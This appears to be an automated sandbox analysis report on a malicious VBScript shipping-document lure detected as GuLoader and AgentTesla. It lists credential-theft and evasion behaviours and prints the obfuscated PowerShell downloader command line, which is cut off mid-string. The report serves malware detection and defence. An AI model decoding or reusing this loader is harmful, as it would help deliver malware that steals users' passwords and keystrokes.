Edit tour
Windows
Analysis Report
Shipping Dcuments_CI PKL_HL_.vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Potential malicious VBS script found (suspicious strings)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 1824 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Shipp ing Dcumen ts_CI PKL_ HL_.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - WmiPrvSE.exe (PID: 4004 cmdline:
C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - powershell.exe (PID: 6816 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Semiannu ally163 = 1;$Varityp ed='Substr in';$Varit yped+='g'; Function S patiumet($ Merotomy){ $Ganglioma =$Merotomy .Length-$S emiannuall y163;For($ Undereying 136=5; $Un dereying13 6 -lt $Gan glioma; $U ndereying1 36+=(6)){$ Stacc+=$Me rotomy.$Va rityped.In voke($Unde reying136, $Semiannu ally163);} $Stacc;}fu nction Sal sdren($For tynd){. ($ Fusionsaft aler) ($Fo rtynd);}$M orallovene =Spatiumet 'FindeM S laboBed,mz GuiltiSu.n olUnforlVa rmeaSkru / Afslr5 p y n.U aft0 K ost Al,og( DdsaaW,pit aiboo lnBr ssedNusseo Sem cwFrem ssDi eg Ch attNPrethT ,oren Supr a1Abe.s0Gu ldv.Colou0 Haema;Adri a Br,dsWr creiForman Refrn6Unco u4velar; L egi noncix non 6 Nik l4Synli; s kri PseurG asm,vP,gts :Bj.rg1 Mo ,i2Organ1A rmad.Flask 0Abs,i)Gal o. r tscGS kyldeAktio c DionkNon cooSyske/, atin2Luged 0Janse1Bul .p0fj.rn0E cin1Pante 0Coope1Sur ro ,aineFF ly eiUvi l r,readeRve ,efDiphyoA phroxHarri /Bygn.1Elu ls2Ebelt1T ra i.Perca 0 Dupe ';$ Anathemati se=Spatium et 'Lill,U Falhos Spl eeP lorrFi ske-OhsknA N.ighg Paw ne MasknLe chrtOnion ';$Aivr=Sp atiumet 'F igurhprein tGer.rtVog nppT.llas. onse:Lay u /Bi,le/ B. lldFinerrF .agti Bj,g vindpae.at te. .ilpgC anchoEurop o Educgwr telAfslaer ed.m.Bak u cK upvoPen gem Vlve/A fstvuperve cFrit ? k, noeLivewxm inerp Belo oTiltrrwin d tU lia=B allodSanke oOp ftwKrv ernDekodlK apreo Oxyd aHum.ld ap pl& ScariG eomedAmnio = Hudd1 Do mmOL.omeS ErroQGal,i aUdbetZKar tolChanikR atapr Tink _ Clar7 Kn a.hF.uevzs padspRovdy 0DeminlAto maSPh.liF PagiBProgr 9 AergdTap pejUdb t3F anmagFagbl xDagplcN,n inEOutf.oU na.etCentr -Sikke9Fig ensbrain5T yven ';$Su ccesombrus t=Spatiume t 'Trykl>P olyh ';$Fu sionsaftal er=Spatium et 'af eni TankeeWatt sxAl um '; $Pantebrev shandelen = Spatiume t ' ntee J erncWkdreh A johoL,xi a D.ske%Sv indaRa,tap DevonpButi ,dCi,araOv eretPennaa Def,n%Prag t\Flec.EFu ,dvlsubape ProvicSort etIndicr T heooEb.lln TroueSup lg Panda . ogltReinsi Driftv Hyp ee Beci. A t eS U.dih Ung oaPer, i Patte&un ion& s.bl Hamm eOste rc KonghUn .pao Urba Lsnin$Pum. c ';Salsdr en (Spatiu met 'Suppl $Enh.lgbol ivlsemino uni,bBolig aSvulmlind sp: Plo,fT ransl Tje, uRinglkGro ovtRa eru JungeCaten r HovniGre ennUndefgo utre=Himme (Tiltac Ep okmXsford Ra.i Prova /datasc De ut Dext.$ mesiPJagte aBoligngel ogt SkileB ehanbEuphe rEnra.eL g tevCrustsi sba.h Dewa aHalopnChr isdSkakte RaillUdadr eDec,lnPaa tv)Antil ' );Salsdren (Spatiume t ' Mist$ Ma,sgTilpr l banko da shb.annyaK ardslQuant :GeledACem ennMaalet Bet.h,iltv r .ndkoAba mppA taco Pa lpPass hPa ahaTr, llgUbereiA gerbsGrns tforsii .a irc E,ip=g arvn$Fratr ASeraliAra pavFenacrO ttea.Journ smorbrpInt arlMandaiC